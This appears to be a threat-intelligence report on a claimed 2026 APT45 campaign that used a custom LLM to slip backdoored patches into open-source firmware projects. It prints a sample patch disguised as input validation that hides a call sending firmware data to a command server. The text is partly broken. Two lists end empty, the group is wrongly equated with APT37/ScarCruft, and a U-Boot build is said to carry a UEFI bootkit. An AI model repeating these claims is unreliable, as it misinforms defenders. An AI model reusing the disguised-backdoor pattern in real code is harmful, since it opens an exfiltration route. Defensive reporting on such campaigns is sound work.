Executive Summary: In Q1 2026, APT45—a state-sponsored advanced persistent threat (APT) group affiliated with North Korea—launched a sophisticated, AI-augmented supply-chain attack campaign targeting open-source firmware repositories. Leveraging generative AI for code synthesis, social engineering, and evasion, APT45 compromised multiple firmware projects, embedding malicious payloads in legitimate code bases. The campaign exploited trust in open-source ecosystems, demonstrating a new paradigm in nation-state cyber operations. This analysis provides a technical breakdown, key findings, and strategic recommendations for mitigation.
APT45’s 2026 operation began in January 2026, with initial reconnaissance on GitHub and GitLab repositories hosting firmware code. The group registered multiple pseudonymous accounts, mimicking legitimate contributors. By March 2026, at least 12 repositories had been compromised, with malicious commits merged under the guise of “bug fixes” or “security patches.”
Infrastructure analysis revealed the use of compromised cloud instances (AWS, Azure) to host command-and-control (C2) servers, as well as AI training servers repurposed for code generation. These servers were linked to previously identified APT45 infrastructure via IP overlap and TLS certificate reuse.
APT45 deployed a custom LLM, codenamed MALMOR, fine-tuned on firmware source code to generate realistic code snippets. MALMOR was trained on thousands of legitimate patches from public repositories, enabling it to produce patches that passed initial static analysis. The AI model also generated plausible commit messages and documentation, reducing suspicion during peer review.
Example malicious patch generated by MALMOR:
// Security fix for CVE-2025-xxxx (simulated)
// Adds input validation to prevent buffer overflow
void firmware_update_handler(uint8_t *data, size_t len) {
// AI-generated input sanitization
if (len > MAX_PAYLOAD) {
log_error("Invalid payload size");
return;
}
// Hidden backdoor: exfiltrate first 64 bytes of firmware
if (is_admin_mode()) {
send_to_c2(data, 64);
}
// ... original logic ...
}
APT45 operators impersonated developers from reputable organizations, submitting “security-focused” pull requests. These were often linked to real-world CVEs or trending security topics to increase legitimacy. In one case, a fake contributor claimed affiliation with a well-known cybersecurity firm, citing a “collaborative audit.”
The group also exploited GitHub Actions workflows, injecting malicious scripts into CI/CD pipelines to exfiltrate build artifacts or compromise build servers. These scripts were obfuscated using AI-generated variable names and control flow flattening.
Once merged, malicious commits were automatically built into firmware images. APT45 used a novel technique called firmware steganography, embedding payloads in unused firmware regions (e.g., padding bytes in flash memory). The payloads were only activated under specific hardware conditions, evading sandbox and emulator-based detection.
In one confirmed incident, a compromised U-Boot build was distributed via a popular embedded Linux vendor’s SDK. The resulting firmware image contained a UEFI bootkit that persisted across reboots and was capable of intercepting system calls.
APT45’s payloads included:
APT45 (also known as ScarCruft, APT37, or Reaper) has been active since at least 2016, primarily targeting South Korea, Japan, and the United States. The 2026 campaign aligns with historical targeting of firmware and supply chains, but introduces AI-driven automation at scale. Infrastructure analysis links this campaign to previous APT45 operations via reused SSL certificates and command patterns observed in leaked North Korean training manuals.
APT45’s use of AI in supply-chain attacks signals a broader trend toward “cognitive supply-chain compromise,” where generative AI is weaponized to automate and scale attacks. We anticipate: